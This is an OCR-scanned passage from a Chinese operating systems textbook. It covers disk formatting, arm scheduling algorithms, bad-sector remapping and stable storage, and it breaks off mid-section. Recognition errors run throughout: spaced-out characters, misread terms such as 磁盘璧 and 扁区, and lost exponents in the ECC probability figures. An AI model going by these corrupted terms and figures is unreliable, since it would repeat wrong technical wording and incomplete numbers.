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在 准备 一 块 磁盘 以 便于 使 用 的 最 后 一 步 是 对 每 一 个 分 区 分 别 执行 一 次 高 级 格式 化 (high-level 
format) 。 这 一 操作 要 设置 一 个 引导 块 、 空 闲 存储 管理 (空闲 列表 或 位 图 ) 、 根 目录 和 一 个 空 文件 系统 。 
这 一 操作 还 要 将 一 个 代码 设置 在 分 区 表 项 中 ， 以 表明 在 分 区 中 使 用 的 是 哪个 文件 系统 ， 因 为 许多 操作 系 
统 支 持 多 个 兼容 的 文件 系统 (由 于 历史 原因 )。 这 时 ， 系 统 就 可 以 引导 了 。 

当 电 源 打 开 时 ，BIOS 最 先 运行 ， 它 读 入 主 引 导 记 录 并 跳 转 到 主 引 导 记 录 。 然 后 这 一 引导 程序 进行 
检查 以 了 解 哪个 分 区 是 活动 的 。 引 导 扇 区 包含 一 个 小 的 程序 ， 它 一 般 会 装 入 一 个 较 大 的 引导 程序 装载 器 ， 
该 引导 程序 装载 器 将 搜索 文件 系统 以 找到 操作 系统 内 核 。 该 程序 被 装 入 内 存 并 执行 


5.4.3 磁盘 臂 调度 算法 

本 小 节 我 们 将 一 般 地 讨论 与 磁盘 驱动 程序 有 关 的 几 个 问题 。 首 先 ， 考 虑 读 或 者 写 一 个 磁盘 块 需要 多 
长 时 间 。 这 个 时 间 由 以 下 三 个 因素 决定 : 

1) 寻 道 时 间 《将 磁盘 璧 移动 到 适当 的 柱 面 上 所 需 的 时 间 ) 。 

2) 旋转 延迟 (等待 适当 扁 区 旋转 到 磁头 下 所 需 的 时 间 )。 

3) 实际 数据 传输 时 间 。 

对 大 多 数 磁盘 而 言 ， 寻 道 时 间 与 另外 两 个 时 间 相 比 占 主导 地 位 ， 所 以 减少 平均 寻 道 时 间 可 以 充分 地 
改善 系统 性 能 。 

如 果 磁 盘 驱 动 程序 每 次 接收 一 个 请 求 并 按照 接收 顺序 完成 请 求 ， 即 先 来 先 服务 (First-Come, First- 
Served，FCFS) ， 则 很 难 优 化 寻 道 时 间 。 然 而 ， 当 磁盘 负载 很 重 时 ， 可 以 采用 其 他 策略 。 很 有 可 能 当 磁 
盘 劈 为 一 个 请 求 寻 道 时 ， 其 他 进程 会 产生 其 他 磁盘 请 求 。 许 多 磁盘 驱动 程序 都 维护 着 一 张 表 ， 该 表 按 柱 
面 号 索引 ， 每 一 柱 面 的 未 完成 的 请 求 组 成 一 个 链表 ， 链 表 头 存放 在 表 的 相应 表 目 中 。 

给 定 这 种 数据 结构 ， 我 们 可 以 改进 先 来 先 服 务 调度 算法 。 为 了 说 明 如 何 实现 ， 考 虑 一 个 具有 40 个 柱 
面 的 假想 的 磁盘 。 假 设 读 柱 面 11 上 一 个 数据 块 的 请 求 到 达 ， 当 对 柱 面 11 的 寻 道 正在 进行 时 ， 又 按 顺 序 到 
达 了 对 柱 面 1、36、16、34、9 和 12 的 请 求 ， 则 让 它们 进入 未 完成 的 请 求 表 ， 每 一 个 柱 面 对 应 一 个 单独 的 
链表 。 图 5-24 显 示 了 这 些 请 求 。 


初始 位 置 ”未 完成 的 请 求 
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图 5-24 最 短 寻 道 优 先 (SSF) 磁盘 调度 算法 


当前 请 求 (请求 柱 面 11) 结束 后 ， 磁 盘 驱 动 程序 要 选择 下 一 次 处 理 哪 一 个 请 求 。 若 使 用 FCFS 算 法 ， 
则 首先 选择 柱 面 1， 然 后 是 36， 以 此 类 推 。 这 个 算法 要 求 磁盘 璧 分 别 移动 10、35、20、18、25 和 3 个 柱 面 ， 
总 共 需 要 移动 111 个 柱 面 。 

另 一 种 方法 是 下 一 次 总 是 处 理 与 磁头 距离 最 近 的 请 求 以 使 寻 道 时 间 最 小 化 。 对 于 图 5-24 中 给 出 的 请 
求 ， 选 择 请 求 的 顺序 如 图 $-24 中 下 方 的 折线 所 示 ， 依 次 为 12、9、16、1、34 和 36。 按 照 这 个 顺序 ， 磁 盘 
臂 分 别 需 要 移动 1、3、7、15、33 和 2 个 柱 面 ， 总 共 需 要 移动 61 个 柱 面 。 这 个 算法 即 最 短 寻 道 优先 
(Shortest Seek First，SSF) ， 与 FCFS 算 法 相 比 ， 该 算法 的 磁盘 璧 移动 几乎 减少 了 一 半 。 

但 是 ，SSF 算 法 存在 一 个 问题 。 假 设 当 图 5-24 所 示 的 请 求 正在 处 理 时 ， 不 断 地 有 其 他 请 求 到 达 。 例 
如 ， 磁 盘 臂 移 到 柱 面 16 以 后 ， 到 达 一 个 对 柱 面 8 的 新 请 求 ， 那 么 它 的 优先 级 将 比 柱 面 1 要 高 。 如 果 接 着 又 
到 达 了 一 个 对 柱 面 13 的 请 求 ， 磁 盘 臂 将 移 到 柱 面 13 而 不 是 柱 面 1。 如 果 磁 盘 负 载 很 重 ， 那 么 大 部 分 时 间 
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磁盘 臂 将 停留 在 磁盘 的 中 部 区 域 ， 而 两 端 极 端 区 域 的 请 求 将 不 得 不 等 待 ， 直 到 负载 中 的 统计 波动 使 得 中 
部 区 域 没 有 请 求 为 止 。 远 离 中 部 区 域 的 请 求 得 到 的 服务 很 差 。 因 此 获得 最 小 响应 时 间 的 目标 和 公平 性 之 
间 存 在 着 冲突 。 

高 层 建筑 也 要 进行 这 种 权衡 处 理 ， 高 层 建 筑 中 的 电梯 调度 问题 和 磁盘 警 调度 很 相似 。 电 梯 请 求 不 断 
地 到 来 ， 随 机 地 要 求 电梯 到 各 个 楼 层 ( 柱 面 )。 控 制 电梯 的 计算 机 能 够 很 容易 地 跟踪 顾客 按 下 请 求 按钮 ， 
的 顺序 ， 并 使 用 FCFS 或 者 SSF 为 他 们 提供 服务 。 

然而 ， 大 多 数 电 梯 使 用 一 种 不 同 的 算法 来 协调 效率 和 公平 性 这 两 个 相互 冲突 的 目标 。 电 梯 保持 按 一 
个 方向 移动 ， 直 到 在 那个 方向 上 没有 请 求 为 止 ， 然 后 改变 方向 。 这 个 算法 在 磁盘 世界 和 电梯 世界 都 被 称 
为 电梯 算法 (elevator algorithm) ， 它 需要 软件 维护 一 个 二 进 制 位 ， 即 当前 方向 位 : UP (向 上 ) 或 是 
DOWN (向 下 )。 当 一 个 请 求 处 理 完 之 后 ， 磁 盘 或 电梯 的 驱动 程序 检查 该 位 ， 如 果 是 UP， 磁 盘 臂 或 电梯 
舱 移 至 下 一 个 更 高 的 未 完成 的 请 求 。 如 果 更 高 的 位 置 没 有 未 完成 的 请 求 ， 则 方向 位 取 反 。 当 方向 位 设置 
为 DOWN 时 ， 同 时 存在 一 个 低位 置 的 请 求 ， 则 移 向 该 位 置 。 如 果 不 存在 未 决 的 请 求 ， 那 么 它 只 是 停止 并 
等 待 。 

图 5-25 显 示 了 使 用 与 图 5-24 相 同 的 7 个 请 求 的 电梯 算法 的 情况 。 假 设 方向 位 初始 为 UP， 则 各 柱 面 获 
得 服务 的 顺序 是 12、16、34、36、9 和 1， 磁 盘 臂 分 别 移动 1、4、18、2、27 和 8 个 柱 面 ， 总 共 移 动 60 个 柱 
面 。 在 本 例 中 ， 电 梯 算 法 比 SSF 还 要 稍微 好 一 点 ， 尽 管 通常 它 不 如 SSF。 电 梯 算法 的 一 个 优良 特性 是 对 
任意 的 一 组 给 定 请 求 ， 磁 盘 臂 移动 总 次 数 的 上 界 是 固定 的 : 正好 是 柱 面 数 的 两 倍 。 

对 这 个 算法 稍 加 改进 可 以 在 响应 时 间 上 具有 更 小 的 变异 (Teory，1972) ， 方 法 是 总 是 按 相同 的 方向 
进行 扫描 。 当 处 理 完 最 高 编号 柱 面 上 未 完成 的 请 求 之 后 ,磁盘 警 移动 到 具有 未 完成 的 请 求 的 最 低 编 号 的 
柱 面 ， 然 后 继续 沿 向 上 的 方向 移动 。 实 际 上 ， 这 相当 于 将 最 低 编 号 的 柱 面 看 作 最 高 编号 的 柱 面 之 上 的 相 
邻 柱 面 。 
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图 5-25 调度 磁盘 请 求 的 电梯 算法 


某 些 磁盘 控制 器 提供 了 一 种 方法 供 软件 检查 磁头 下 方 的 当前 扇 区 号 。 对 于 这 种 磁盘 控制 器 ， 还 可 以 
进行 另 一 种 优化 。 如 果 针 对 同一 柱 面 有 两 个 或 多 个 请 求 正 等 待 处 理 ， 驱 动 程序 可 以 发 出 请 求 读 写 下 一 次 
要 通过 磁头 的 扇 区 。 注 意 ， 当 一 个 柱 面 有 多 条 磁道 时 ， 相 继 的 请 求 可 能 针对 不 同 的 磁道 ， 故 没有 任何 代 
价 。 因 为 选择 磁头 既 不 需要 移动 磁盘 臂 也 没有 旋转 延迟 ， 所 以 控制 器 几乎 可 以 立即 选择 任意 磁头 。 

如 果 磁 盘 具 有 寻 道 时 间 比 旋转 延迟 快 很 多 的 特性 ， 那 么 应 该 使 用 不 同 的 优化 策略 。 未 完成 的 请 求 应 
该 按 扇 区 号 排序 ， 并 且 当 下 一 个 遍 区 就 要 通过 磁头 的 时 候 ， 磁 盘 辟 应 该 飞快 地 移动 到 正确 的 磁道 上 对 其 
进行 读 或 者 写 。 

对 于 现代 硬盘 ， 寻 道 和 旋转 延迟 是 如 此 影响 性 能 ， 所 以 一 次 只 读 取 一 个 或 两 个 局 区 的 效率 是 非常 低 
下 的 。 由 于 这 个 原因 ， 许 多 磁盘 控制 器 总 是 读 出 多 个 遍 区 并 对 其 进行 高 速 缓 在， 即使 只 请 求 一 个 扇 区 时 
也 是 如 此 。 典 型 地 , 读 一 个 扇 区 的 任何 请 求 将 导致 该 扇 区 和 当前 磁道 的 多 个 或 者 所 有 剩余 的 扇 区 被 读 出 ， 
读 出 的 扁 区 数 取决 于 控制 器 的 高 速 缓存 中 有 多 少 可 用 的 空间 。 例 如 ， 在 图 5-18 所 描述 的 磁盘 中 有 4MB 的 
高 速 缓 存 。 高 速 缓存 的 使 用 是 由 控制 器 动态 地 决定 的 。 在 最 简单 的 模式 下 ， 高 速 缓存 被 分 成 两 个 区 段 ， 
一 个 用 于 读 ， 一 个 用 于 写 。 如 果 后 来 的 读 操作 可 以 用 控制 器 的 高 速 缓存 来 满足 ， 那 么 就 可 以 立即 返回 被 
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请 求 的 数据 。 

值得 注意 的 是 ， 磁 盘 控制 器 的 高 速 缓存 完全 独立 于 操作 系统 的 高 速 缓 在。 控制 器 的 高 速 缓存 通常 保 
存 还 没有 实际 被 请 求 的 块 ， 但 是 这 对 于 读 操作 是 很 便利 的 ， 因 为 它们 只 是 作为 某 些 其 他 读 操作 的 附带 效 
应 而 恰巧 要 在 磁头 下 通过 。 与 之 相反 ， 操 作 系统 所 维护 的 任何 高 速 缓存 由 显 式 地 读 出 的 块 组 成 ， 并 且 操 
作 系 统 认为 它们 在 较 近 的 将 来 可 能 再 次 需要 (例如 ， 保 存 目录 块 的 一 个 磁盘 块 )。 

当 同 一 个 控制 器 上 有 多 个 驱动 器 时 ,操作 系统 应 该 为 每 个 驱动 器 都 单独 地 维护 一 个 未 完成 的 请 求 表 。 
一 且 任 何 一 个 驱动 器 空闲 下 来 ， 就 应 该 发 出 一 个 寻 道 请 求 将 磁盘 臂 移 到 下 一 个 将 被 请 求 的 柱 面 处 〈 假 设 
控制 器 允许 重 登 寻 道 ) 。 当 前 传输 结束 时 ， 将 检查 是 否 有 驱动 器 的 磁盘 臂 位 于 正确 的 柱 面 上 。 如 果 存 在 
一 个 或 多 个 这 样 的 驱动 器 ， 则 在 磁盘 臂 已 经 位 于 正确 柱 面 处 的 驱动 器 上 开始 下 一 次 传输 。 如 果 没 有 驱动 
器 的 磁盘 臂 处 于 正确 的 位 置 ， 则 驱动 程序 在 刚刚 完成 传输 的 驱动 器 上 发 出 一 个 新 的 寻 道 命令 并 且 等 待 ， 
直到 下 一 次 中 断 到 来 时 检查 哪 一 个 磁盘 臂 首 先 到 达 了 目标 位 置 。 

上 面 所 有 的 磁盘 调度 算法 都 是 默认 地 假设 实际 磁盘 的 几何 规格 与 虚拟 几何 规格 相同 ， 认 识 到 这 一 点 
十 分 重要 。 如 果 不 是 这 样 ， 那 么 调度 磁盘 请 求 就 毫 无 意义 ， 因 为 操作 系统 实际 上 不 能 断定 柱 面 40 与 柱 面 
200 哪 一 个 与 柱 面 39 更 接近 。 另 一 方面 ， 如 果 磁 盘 控 制 器 能 够 接收 多 个 未 完成 的 请 求 ， 它 就 可 以 在 内 部 
使 用 这 些 调 度 算 法 。 在 这 样 的 情况 下 ， 算 法 仍然 是 有 效 的 ， 但 是 低 了 一 个 层次 ， 局 限 在 控制 器 内 部 。 


5.4.4 错误 处 理 

磁盘 制造 商 通过 不 断 地 加 大 线性 位 密度 而 持续 地 推进 技术 的 极限 。 在 一 块 5.25 英 寸 的 磁盘 上 ， 处 于 
中 间 位 置 的 一 个 磁道 大 约 有 300mm 的 周 长 。 如 果 该 磁道 存放 300 个 512 字 节 的 扇 区 ， 考 虑 到 由 于 前 导 码 、 
ECC 和 扁 区 间隙 而 损失 了 部 分 空间 这 样 的 实际 情况 ， 线 性 记录 密度 大 约 是 5000b/mm。 记 录 5000b/mm 需 
要 极其 均匀 的 基 片 和 非常 精细 的 氧化 物 涂 层 。 但 是 ， 按 照 这 样 的 规范 制造 磁盘 而 没有 瑕 症 是 不 可 能 的 。 
一 旦 制造 技术 改进 到 一 种 程度 ， 即 在 那样 的 密度 下 能 够 无 瑕 症 地 操作 ， 磁 盘 设 计 者 就 会 转 到 更 高 的 密度 
以 增加 容量 。 这 样 做 可 能 会 再 次 引入 瑕 意 。 

制造 时 的 瑕 症 会 引入 坏 饥 区 , 也 就 是 说 , 扁 区 不 能 正确 地 读 回 刚刚 写 到 其 上 的 值 。 如 果 瑕 症 非 常 小 ， 
比如 说 只 有 几 位 ， 那 么 使 用 坏 扇 区 并 且 每 次 只 是 让 ECC 校 正 错误 是 可 能 的 。 如 果 环 症 较 大 ， 那 么 错误 就 
不 可 能 被 掩盖 。 

对 于 坏 块 存在 两 种 一 般 的 处 理 方法 : 在 控制 器 中 对 它们 进行 处 理 或 者 在 操作 系统 中 对 它们 进行 处 理 。 
在 前 一 种 方法 中 ， 磁 盘 在 从 工厂 出 厂 之 前 要 进行 测试 ， 并 且 将 一 个 坏 扇 区 列表 写 在 磁盘 上 。 对 于 每 一 个 
坏 遍 区， 用 一 个 备用 局 区 替换 它 。 

有 两 种 方法 进行 这 样 的 替换 。 在 图 5-26a 中 ， 我 们 看 到 单个 磁盘 磁道 ， 它 具有 30 个 数据 扇 区 和 两 个 
备用 扇 区 。 遍 区 7 是 有 下 症 的 。 控 制 器 所 能 够 做 的 事情 是 将 备用 遍 区 之 一 重 映射 为 扁 区 7， 如 图 5-26b 所 
示 。 另 一 种 方法 是 将 所 有 扇 区 向 上 移动 一 个 扁 区 ， 如 图 5-26c 所 示 。 在 这 两 种 情况 下 ， 控 制 器 都 必须 知 
道 哪 个 遍 区 是 哪个 遍 区 。 它 可 以 通过 内 部 的 表 来 跟踪 这 一 信息 〈 每 个 磁道 一 张 表 ) ， 或 者 通过 重 写 前 导 
码 来 给 出 重 映射 的 遍 区 号 。 如 果 是 重 写 前 导 码 ， 那 么 图 5-26c 的 方法 就 要 做 更 多 的 工作 (因为 23 个 前 导 
码 必须 重 写 )， 但 是 最 终 会 提供 更 好 的 性 能 ， 因 为 整个 磁道 仍然 可 以 在 旋转 一 周 中 读 出 。 





图 5-26 a) 具有 一 个 坏 扇 区 的 磁盘 磁道 ，b) 用 备用 扇 区 替换 坏 遍 区 ，c) 移动 所 有 扇 区 以 回避 坏 遍 区 
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驱动 器 安装 之 后 在 正常 工作 期 间 也 会 出 现 错误 。 在 遇 到 ECC 不 能 处 理 的 错误 时 ， 第 一 道 防线 只 是 试 
图 再 次 读 。 某 些 读 错误 是 瞬时 性 的 ， 也 就 是 说 是 由 磁头 下 的 灰尘 导致 的 ， 在 第 二 次 尝试 时 错误 就 消失 了 。 
如 果 控 制 器 注意 到 它 在 某 个 扁 区 遇 到 重复 性 的 错误 ， 那 么 可 以 在 该 扁 区 完全 死 掉 之 前 切换 到 一 个 备用 扇 
区 。 这样 就 不 会 丢失 数据 并 且 操 作 系 统 和 用 户 甚至 都 不 会 注意 到 这 一 问题 。 通常 使 用 的 是 图 5-26b 的 方法 ， 
因为 其 他 遍 区 此 刻 可 能 包含 数据 。 而 使 用 图 $-26c 的 方法 则 不 但 要 重 写 前 导 码 ， 还 要 复制 所 有 的 数据 。 

前 面 我 们 曾 说 过 存在 两 种 一 般 的 处 理 错误 的 方法 : 在 控制 器 中 或 者 在 操作 系统 中 处 理 错误 。 如 果 控 
制 器 不 具有 像 我 们 已 经 讨论 过 的 那样 透明 地 重 映射 扇 区 的 能 力 ， 那 么 操作 系统 必须 在 软件 中 做 同样 的 事 
情 。 这 意味 着 操作 系统 必须 首先 获得 一 个 坏 扇 区 列表 ， 或 者 是 通过 从 磁盘 中 读 出 该 列表 ， 或 者 只 是 由 它 
自己 测试 整个 磁盘 。 一 旦 操作 系统 知道 哪些 扇 区 是 坏 的 ， 它 就 可 以 建立 重 映射 表 。 如 果 操 作 系统 想 使 用 
图 5-26c 的 方法 ， 它 就 必须 将 扇 区 7 到 扇 区 29 中 的 数据 向 上 移动 一 个 扇 区 。 

如 果 由 操作 系统 处 理 重 映射 ， 那 么 它 必须 确保 坏 扇 区 不 出 现在 任何 文件 中 ， 并 且 不 出 现在 空闲 列表 
或 位 图 中 。 做 到 这 一 点 的 一 种 方法 是 创建 一 个 包含 所 有 坏 扇 区 的 秘密 的 文件 。 如 果 该 文件 不 被 加 入 文件 
系统 ， 用 户 就 不 会 意外 地 读 到 它 GRA RH, Pre). 

然而 ， 还 存在 另 一 个 问题 : 备份 。 如 果 磁 盘 是 一 个 文件 一 个 文件 地 做 备份 ， 那 么 非常 重要 的 是 备份 
实用 程序 不 去 尝试 复制 坏 块 文件 。 为 了 防止 发 生 这 样 的 事情 ， 操 作 系 统 必 须 很 好 地 隐藏 坏 块 文件 ， 以 至 
于 备份 实用 程序 也 不 能 发 现 它 。 如 果 磁 盘 是 一 个 遍 区 一 个 遍 区 地 做 备份 而 不 是 一 个 文件 一 个 文件 地 做 备 
份 ， 那 么 在 备份 期 间 防 止 读 错误 是 十 分 困难 的 ， 如 果 不 是 不 可 能 的 话 。 唯 一 的 希望 是 备份 程序 具有 足够 
的 智能 ， 在 读 失 败 10 次 后 放弃 并 且 继 续 下 一 个 扁 区 。 

坏 扇 区 不 是 唯一 的 错误 来 源 ， 也 可 能 发 生 磁盘 臂 中 的 机 械 故 障 引起 的 寻 道 错误 。 控 制 器 内 部 跟踪 着 
磁盘 臂 的 位 置 ， 为 了 执行 寻 道 ， 它 发 出 一 系列 脉冲 给 磁盘 臂 电 机 ， 每 个 柱 面 一 个 脉冲 ， 这 样 将 磁盘 劈 移 
到 新 的 柱 面 。 当 磁盘 辟 移 到 其 目标 位 置 时 ， 控 制 器 从 下 一 个 扁 区 的 前 导 码 中 读 出 实际 的 柱 面 号 。 如 果 磁 
盘 臂 在 错误 的 位 置 上 ， 则 发 生 寻 道 错误 。 

大 多 数 硬 盘 控制 器 可 以 自动 纠正 寻 道 错误 ， 但 是 20 世 纪 80 年 代 和 90 年 代 使 用 的 大 多 数 旧式 软盘 控制 
器 只 是 设置 一 个 错误 标志 位 而 把 余下 的 工作 留 给 驱动 程序 。 驱 动 程序 对 这 一 错误 的 处 理 办 法 是 发 出 一 个 
recalibrate (重新 校准 ) 命令 ， 让 磁盘 璧 尽 可 能 地 向 最 外 面 移动 ， 并 将 控制 器 内 部 的 当前 柱 面 重 置 为 0。 
通常 这 样 就 可 以 解决 问题 了 。 如 果 还 不 行 ， 则 只 好 修理 驱动 器 。 

正如 我 们 已 经 看 到 的 ， 控 制 器 实际 是 一 个 专用 的 小 计算 机 ， 它 有 软件 、 变 量 、 缓 冲 区 ， 偶 尔 还 出 现 
故障 。 有 时 一 个 不 寻常 的 事件 序列 ， 例 如 一 个 驱动 器 发 生 中 断 的 同时 另 一 个 驱动 器 发 出 recalibrate 命 令 ， 
就 可 能 引发 一 个 故障 ， 导 致 控制 器 陷入 一 个 循环 或 失去 对 正在 做 的 工作 的 跟踪 。 控 制 器 的 设计 者 通常 考 
虑 到 最 坏 的 情形 ， 在 芯片 上 提供 了 一 个 引 脚 ， 当 该 引 脚 被 置 起 时 ， 迫 使 控制 器 忘记 它 正在 做 的 任何 事情 
并 且 将 其 自身 复位 。 如 果 其 他 方法 都 失败 了 ， 磁 盘 驱 动 程序 可 以 设置 一 个 控制 位 以 触发 该 信号 ， 将 控制 
器 复位 。 如 果 还 不 成 功 ， 驱 动 程序 所 能 做 的 就 是 打印 一 条 消息 并 且 放 弃 。 

重新 校准 一 块 磁盘 会 发 出 古怪 的 噪音 ， 但 是 正常 工作 时 并 不 让 人 烦 扰 。 然 而 ， 存 在 这 样 一 种 情形 ， 
对 于 具有 实时 约束 的 系统 而 言 重新 校准 是 一 个 严重 的 问题 。 当 从 硬盘 播放 视频 时 ， 或 者 当 将 文件 从 硬盘 
烧 录 到 蓝光 光盘 上 时 ， 来自 硬盘 的 位 流 以 均匀 的 速率 到 达 是 必需 的 。 在 这 样 的 情况 下 ， 重 新 校准 会 在 位 
流 中 插入 间隙 ， 因 此 是 不 可 接受 的 。 称 为 AV 盘 (Audio Visual disk， 音 视盘 ) 的 特殊 驱动 器 永远 不 会 重 
新 校准 ， 因 而 可 用 于 这 样 的 应 用 。 i 

有 趣 的 是 ， 一 名 荷兰 黑客 Jeroen Domburg 做 出 了 极其 令 人 信服 的 演示 ， 证 明了 高 级 磁盘 控制 器 已 经 
变 得 如 何 一 一 他 破解 了 一 个 现代 磁盘 控制 器 ， 使 其 运行 定制 的 代码 。 业 已 证 明 ， 该 磁盘 控制 器 装 有 一 枚 
相当 强大 的 多 核 (! ) ARM 处 理 器 ， 具 有 足够 的 资源 可 以 轻易 地 运行 Linux。 如 果 坏 人 以 这 样 的 方式 破 
解 你 的 硬盘 驱动 器 ， 那 么 他 就 能 够 看 到 并 且 修 改 向 磁盘 传人 和 从 磁盘 传 出 的 所 有 数据 。 即 使 重新 安装 操 
作 系 统 也 不 能 除 掉 感 染 ， 因 为 磁盘 控制 器 本 身 就 是 恶意 的 并 且 充 当 了 永久 的 后 门 。 另 一 方面 ， 你 也 可 以 
从 当地 的 废品 回收 中 心 收集 一 堆 坏 掉 的 硬盘 驱动 器 ， 免 费 构建 你 自己 的 集群 计算 机 。 


5.4.5 稳定 存储 器 
正如 我 们 已 经 看 到 的 ， 磁 盘 有 时 会 出 现 错误 。 好 扇 区 可 能 突然 变 成 坏 遍 区 ， 整 个 驱动 器 也 可 能 出 乎 
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意料 地 死 掉 。RAID 可 以 对 几 个 遍 区 出 错 或 者 整个 驱动 器 崩溃 提供 保护 。 然 而 ，RAID 首 先 不 能 对 将 坏 数 
据 写 下 的 写 错 误 提供 保护 ， 并 且 也 不 能 对 写 操 作 期 间 的 崩溃 提供 保护 ， 这 样 就 会 破坏 原始 数据 而 不 能 以 
更 新 的 数据 替换 它们 。 

对 于 某 些 应 用 而 言 ， 决 不 丢失 或 破坏 数据 是 绝对 必要 的 ， 即 使 面临 磁盘 和 CPU 错误 也 是 如 此 。 理 想 
的 情况 是 ， 磁 盘 应 该 始终 没有 错误 地 工作 。 但 是 ， 这 是 做 不 到 的 。 所 能 够 做 到 的 是 ， 一 个 磁盘 子 系统 具 
有 如 下 特性 : 当 一 个 写 命令 发 给 它 时 ， 磁 盘 要 么 正确 地 写 数据 ， 要 么 什么 也 不 做 ， 让 现 有 的 数据 完整 无 
缺 地 留 下 。 这 样 的 系统 称 为 稳定 存储 器 (stable storage)， 并且 是 在 软件 中 实现 的 (Lampson 和 Sturgis， 
1979) 。 目 标 是 不 惜 一 切 代价 保持 磁盘 的 一 致 性 。 下 面 我 们 将 描述 这 种 最 初 思想 的 一 个 微小 的 变 体 。 

在 描述 算法 之 前 ， 重 要 的 是 对 于 可 能 发 生 的 错误 有 一 个 清晰 的 模型 。 该 模型 假设 在 磁盘 写 一 个 块 
(一 个 或 多 个 遍 区 ) 时 ， 写 操作 要 么 是 正确 的 ， 要 么 是 错误 的 ， 并 且 该 错误 可 以 在 随后 的 读 操作 中 通过 
检查 ECC 域 的 值 检测 出 来 。 原 则 上 ， 保 证 错误 检测 是 根本 不 可 能 的 ， 这 是 因为 ， 假 如 使 用 一 个 16 字 节 的 
ECC 域 保护 一 个 512 字 节 的 遍 区 ， 那 么 存在 着 2 个 数据 值 而 仅 有 2: 个 ECC 值 。 因 此 ， 如 果 一 个 块 在 写 
操作 期 间 出 现 错 误 但 是 ECC 没 有 出 错 ， 那 么 存在 着 几 亿 亿 个 错误 的 组 合 可 以 产生 相同 的 ECC。 如 果 某 些 
这 样 的 错误 出 现 ， 则 错误 不 会 被 检测 到 。 大 体 上 ， 随 机 数据 具有 正确 的 16 字 节 ECC 的 概率 大 约 是 2 …”。 
该 概率 值 足够 小 以 至 于 我 们 可 以 视 其 为 零 ， 尽 管 它 实 际 上 并 不 为 零 。 

该 模型 还 假设 一 个 被 正确 写 入 的 扇 区 可 能 会 自发 地 变 坏 并 且 变 得 不 可 读 。 然 而 ， 该 假设 是 : 这 样 的 
事件 非常 少见 ， 以 至 于 在 合理 的 时 间 间 隔 内 (例如 1 天 ) 让 相同 的 扇 区 在 第 二 个 (独立 的 ) 驱动 器 上 变 
坏 的 概率 小 到 可 以 忽略 的 程度 。 

该 模型 还 假设 CPU 可 能 出 故障 ， 在 这 样 的 情况 下 只 能 停机 。 在 出 现 故障 的 时 刻 任何 处 于 进行 中 的 磁 
盘 写 操作 也 会 停止 ， 导 致 不 正确 的 数据 写 在 一 个 扇 区 中 并 且 后 来 可 能 会 检测 到 不 正确 的 ECC。 在 所 有 这 
些 情 况 下 ， 稳 定 存储 器 就 写 操作 而 言 可 以 提供 100% 的 可 靠 性 ， 要 么 就 正确 地 工作 ， 要 么 就 让 旧 的 数据 
原封 不 动 。 当 然 ， 它 不 能 对 物理 灾难 提供 保护 ， 例 如 ， 发 生地 震 ， 计 算 机 跌落 100m 掉 入 一 个 裂 颖 并 且 
陷入 沸腾 的 岩浆 池 中 ， 在 这 样 的 情况 下 用 软件 将 其 恢复 是 勉 为 其 难 的 。 

稳定 存储 器 使 用 一 对 完全 相同 的 磁盘 , 对 应 的 块 一 同 工 作 以 形成 一 个 无 差错 的 块 。 当 不 存在 错误 时 ， 
在 两 个 驱动 器 上 对 应 的 块 是 相同 的 ， 读 取 任 意 一 个 都 可 以 得 到 相同 的 结果 。 为 了 达到 这 一 目的 ， 定 义 了 
下 述 三 种 操作 : 

1) 稳定 写 (stable write) 。 稳 定 写 首 先 将 块 写 到 驱动 器 1 上 ， 然 后 将 其 读 回 以 校 验 写 的 是 正确 的 。 如 
果 写 的 不 正确 ， 那 么 就 再 次 做 写 和 重读 操作 ， 一 直到 "次 ， 直 到 正常 为 止 。 经 过 nm 次 连续 的 失败 之 后 ， 就 
将 该 块 重 映射 到 一 个 备用 块 上 ， 并 且 重 复写 和 重读 操作 直到 成 功 为 止 ， 无 论 要 尝试 多 少 个 备用 块 。 在 对 
驱动 器 1 的 写成 功 之 后 ， 对 驱动 器 2 上 对 应 的 块 进行 写 和 重读 ， 如 果 需 要 的 话 就 重复 这 样 的 操作 ， 直 到 最 
后 成 功 为止 。 如 果 不 存在 CPU 崩溃 ， 那 么 当 稳定 写 完成 后 ， 块 就 正确 地 被 写 到 两 个 驱动 器 上 ， 并 且 在 两 
个 驱动 器 上 得 到 校 验 。 

2) 稳定 读 (stable read) 。 稳 定 读 首先 从 驱动 器 1 上 读 取 块 。 如 果 这 一 操作 产生 错误 的 ECC， 则 再 次 
尝试 读 操 作 ， 一 直到 "次 。 如 果 所 有 这 些 操 作 都 给 出 错误 的 ECC ， 则 从 驱动 器 2 上 读 取 对 应 的 数据 块 。 给 
定 一 个 成 功 的 稳定 写 为 数据 块 留 下 两 个 可 靠 的 副本 这 样 的 事实 ， 并 且 我 们 假设 在 合理 的 时 间 间 隔 内 相同 
的 块 在 两 个 驱动 器 上 自发 地 变 坏 的 概率 可 以 忽略 不 计 ， 那 么 稳定 读 就 总 是 成 功 的 。 

3) 崩溃 恢复 (crash recovery)。 崩 溃 之 后 ， 恢 复 程序 扫描 两 个 磁盘 ， 比 较 对 应 的 块 。 如 果 一 对 块 都 
是 好 的 并 且 是 相同 的 ， 就 什么 都 不 做 。 如 果 其 中 一 个 具有 ECC 错 误 ， 那 么 坏 块 就 用 对 应 的 好 块 来 覆盖 。 
如 果 一 对 块 都 是 好 的 但 是 不 相同 ， 那 么 就 将 驱动 器 1 上 的 块 写 到 驱动 器 2 上 。 

如 果 不 存 在 CPU 崩溃 ， 那 么 这 一 方法 总 是 可 行 的 ， 因 为 稳定 写 总 是 对 每 个 块 写 下 两 个 有 效 的 副本 ， 
并 且 假 设 自发 的 错误 决 不 会 在 相同 的 时 刻 发 生 在 两 个 对 应 的 块 上 。 如 果 在 稳定 写 期 间 出 现 CPU 崩溃 会 怎 
么 样 ? 这 就 取决 于 崩溃 发 生 的 精确 时 间 。 有 5 种 可 能 性 ， 如 图 $-27 所 示 。 

在 图 5-27a 中 ，CPU 崩 溃 发 生 在 写 块 的 两 个 副本 之 前 。 在 恢复 的 时 候 ， 什 么 都 不 用 修改 而 旧 的 值 将 
继续 存在 ， 这 是 允许 的 。 

在 图 5-27b 中 ，CPU 崩 省 发 生 在 写 驱动 器 1 期 间 ， 破 坏 了 该 块 的 内 容 。 然 而 恢复 程序 能 够 检测 出 这 一 
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错误 ， 并 且 从 驱动 器 2 恢复 驱动 器 1 上 的 块 。 因 此 ， 这 一 崩溃 的 影响 被 消除 并 且 旧 的 状态 完全 被 恢复 。 
在 图 5-27c 中 ，CPU 崩 溃 发 生 在 写 完 驱动 器 1 之 后 但 是 还 没有 写 驱动 器 2 之 前 。 此 时 已 经 过 了 无 法 复 
